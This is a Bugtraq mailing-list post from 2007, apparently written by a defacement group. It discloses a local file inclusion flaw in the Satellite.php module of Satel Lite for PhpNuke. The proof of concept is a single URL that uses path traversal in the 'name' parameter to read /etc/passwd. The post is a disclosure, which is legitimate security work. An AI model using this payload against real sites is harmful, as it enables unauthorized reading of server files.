bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Satel Lite for PhpNuke (Satellite.php) <= Local File Inclusion

from [stormhacker] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: Satel Lite for PhpNuke (Satellite.php) <= Local File Inclusion
From: stormhacker@hotmail.com
Date: 26 Mar 2007 14:54:04 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
+--------------------------------------------------------------------
+
+ Satel Lite for PhpNuke (Satellite.php) <= Local File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: NUke Satel lite
+ Class .............: LoCal File Inclusion
+ Risk ..............: high (LoCal File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+http://www.example.com/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index
+
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE 
||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • Satel Lite for PhpNuke (Satellite.php) <= Local File Inclusion, stormhacker <=
Previous by Date:  Fizzle : Firefox Extension Vulnerability, CrYpTiC MauleR
Next by Date:  Re: Linksys WAG200G - Information disclosure, Bartłomiej Ochman
Previous by Thread:  Fizzle : Firefox Extension Vulnerability, CrYpTiC MauleR
Next by Thread:  Re: [Full-disclosure] XSS at Aon.at, Austrian ISP, Nikolay Kichukov
Indexes:  [Date] [Thread] [Top] [All Lists]